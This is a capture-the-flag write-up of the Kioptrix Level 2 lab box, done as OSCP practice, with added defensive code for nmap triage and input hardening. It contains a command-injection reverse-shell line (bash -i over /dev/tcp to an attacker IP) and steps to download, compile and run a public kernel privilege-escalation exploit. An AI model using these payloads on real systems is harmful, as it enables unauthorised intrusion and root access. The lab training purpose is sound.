Kioptrix: Level 2

I have 24 more days to prepare for OSCP.


Enumeration

I ran netdiscover to find the IP of the vulnerable box.

netdiscover -i eth0


I ran NMAP to check for open ports and running services.

nmap -p- -sV -sS -T4 -A -oX Kioptrixlvl2.xml 192.168.33.134

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-17 06:53 EDT
Stats: 0:00:31 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 71.43% done; ETC: 06:53 (0:00:04 remaining)
Nmap scan report for 192.168.33.134
Host is up (0.00049s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 629/udp status
|_ 100024 1 632/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2017-05-17T07:44:20+00:00; -3h09m39s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
632/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:83:E9:87 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -3h09m39s, deviation: 0s, median: -3h09m39s

TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms 192.168.33.134

Post-scan script results:
| clock-skew:
|_ -3h09m39s: Majority of systems scanned
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.10 seconds
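The scan above was also written to Kioptrixlvl2.xml with -oX. The following is an added example, not code from the original post, showing how a defender would triage that XML automatically: it walks every open port and flags the legacy-protocol findings visible in the text output (SSHv1 on 22, SSLv2 and an export-grade cipher on 443). The XML embedded in the block is a constructed excerpt shaped like nmap's -oX format for ports 22, 80 and 443, not the real scan file.

```python
"""Added example, not part of the original post: triage an nmap -oX file for
deprecated protocols. SAMPLE_XML is a constructed excerpt in nmap's XML shape;
the real Kioptrixlvl2.xml carries more attributes and ports."""
import xml.etree.ElementTree as ET

# Constructed sample mirroring the text scan above (assumed, not the real file).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="7.25BETA2">
<host><status state="up"/>
<address addr="192.168.33.134" addrtype="ipv4"/>
<address addr="00:0C:29:83:E9:87" addrtype="mac"/>
<ports>
<port protocol="tcp" portid="22"><state state="open"/>
<service name="ssh" product="OpenSSH" version="3.9p1" extrainfo="protocol 1.99"/>
<script id="sshv1" output="Server supports SSHv1"/></port>
<port protocol="tcp" portid="80"><state state="open"/>
<service name="http" product="Apache httpd" version="2.0.52"/></port>
<port protocol="tcp" portid="443"><state state="open"/>
<service name="http" product="Apache httpd" version="2.0.52" tunnel="ssl"/>
<script id="sslv2" output="&#xa;  SSLv2 supported&#xa;  ciphers:&#xa;    SSL2_RC4_128_EXPORT40_WITH_MD5&#xa;    SSL2_DES_64_CBC_WITH_MD5"/></port>
</ports></host></nmaprun>"""

# NSE script ids whose presence on an open port is itself a finding.
LEGACY_SCRIPTS = {
    "sshv1": "SSH protocol 1 offered",
    "sslv2": "SSLv2 offered",
}


def find_legacy_protocols(xml_text: str) -> list:
    """Return (address, port, product, finding) tuples for every open port
    whose NSE script results show a deprecated protocol or an export cipher."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            label = f"{port.get('portid')}/{port.get('protocol')}"
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(p for p in (svc.get("product"), svc.get("version")) if p)
            for script in port.findall("script"):
                sid = script.get("id")
                output = script.get("output") or ""
                if sid in LEGACY_SCRIPTS:
                    findings.append((addr, label, product, LEGACY_SCRIPTS[sid]))
                # Export-grade suites show up inside the sslv2 script's output text.
                if sid == "sslv2" and "EXPORT" in output:
                    findings.append((addr, label, product, "export-grade SSLv2 cipher suite"))
    return findings


if __name__ == "__main__":
    for finding in find_legacy_protocols(SAMPLE_XML):
        print("%s %-8s %-20s %s" % finding)
```

Point the same function at the real file with ET.parse("Kioptrixlvl2.xml").getroot() (or read the file into a string) to get the same tuples for every host in a larger scan.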


Exploitation

The site served by Apache on port 80 is a login page that can be bypassed with SQL injection.

After I bypassed the login page, I was redirected to a page with a ping function. Then I checked whether the page was vulnerable to remote code execution.


Seeing the output of ifconfig come back, I confirmed that the application is vulnerable to command injection.

Next, I set up a netcat listener.

nc -nlvp 4444

Then, I used this command to connect back to our attacking machine.

192.168.33.129;bash -i >& /dev/tcp/192.168.33.129/4444 0>&1

After I clicked on the submit button the target machine connected to my attacking machine.
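Both web flaws used above, the login bypassed by SQL injection and the ping form that hands the "host" field to a shell, come down to user input being spliced into a command or query string. The block below is an added example, not code from the Kioptrix VM or from the original post, showing the defensive counterpart: a strict allow-list for the ping target, an argv list so no shell ever parses the input, a parameterised login query with salted hashes, and a small detector a log reviewer or WAF rule could reuse. The demo account and every function name are assumptions made for illustration.

```python
"""Added example (not the Kioptrix application or the original post's code):
hardened versions of the ping handler and the login check exploited above.
The demo user, credentials and function names are assumptions."""
import hashlib
import hmac
import ipaddress
import os
import re
import sqlite3

# Shell metacharacters that never belong in a hostname or IP address.
_SHELL_META = re.compile(r"[;&|`$<>(){}\\\n\r]")


def looks_like_injection(submitted: str) -> bool:
    """Detection helper for access logs or a WAF rule: True when a submitted
    'host' field carries shell metacharacters, as the ;bash -i payload does."""
    return bool(_SHELL_META.search(submitted))


def ping_target_is_valid(target: str) -> bool:
    """Allow-list check: the form accepts an IPv4/IPv6 literal and nothing else."""
    try:
        ipaddress.ip_address(target.strip())
    except ValueError:
        return False
    return True


def build_ping_argv(target: str, count: int = 3) -> list:
    """Return ping's argv as a list so subprocess.run(argv) is called without
    shell=True; the target is then a single argument, never parsed by a shell."""
    if not ping_target_is_valid(target):
        raise ValueError(f"rejected ping target: {target!r}")
    return ["ping", "-c", str(count), str(ipaddress.ip_address(target.strip()))]


def _pbkdf2(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def setup_demo_db() -> sqlite3.Connection:
    """In-memory user table with one constructed account (assumed credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("admin", salt, _pbkdf2("correct horse battery", salt)))
    conn.commit()
    return conn


def check_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised lookup: the username is bound as data, so quotes or an OR
    clause inside it are compared literally instead of rewriting the query."""
    row = conn.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    # Constant-time comparison of the derived hash against the stored one.
    return hmac.compare_digest(_pbkdf2(password, salt), stored)


if __name__ == "__main__":
    db = setup_demo_db()
    print(build_ping_argv("192.168.33.129"))
    print(looks_like_injection("192.168.33.129;bash -i"))
    print(check_login(db, "admin", "correct horse battery"))
```

The two defences are independent: even if the allow-list were loosened to accept hostnames, passing an argv list to subprocess without shell=True still keeps metacharacters from being interpreted, and the parameterised query keeps the login intact regardless of what the username contains.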

I googled “2.6.9-55 el exploit” and found this exploit.

“Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) – ‘ip_append_data()’ Ring0 Privilege Escalation (1)”

https://www.exploit-db.com/exploits/9542/

I downloaded the exploit into the /tmp folder on the victim machine.

wget -O exploit.c https://www.exploit-db.com/download/9542

I encountered a certificate problem, so I used this command instead.
wget -O exploit.c --no-check-certificate https://www.exploit-db.com/download/9542

I compiled the exploit.c.
gcc exploit.c -o exploit

I ran it.
./exploit
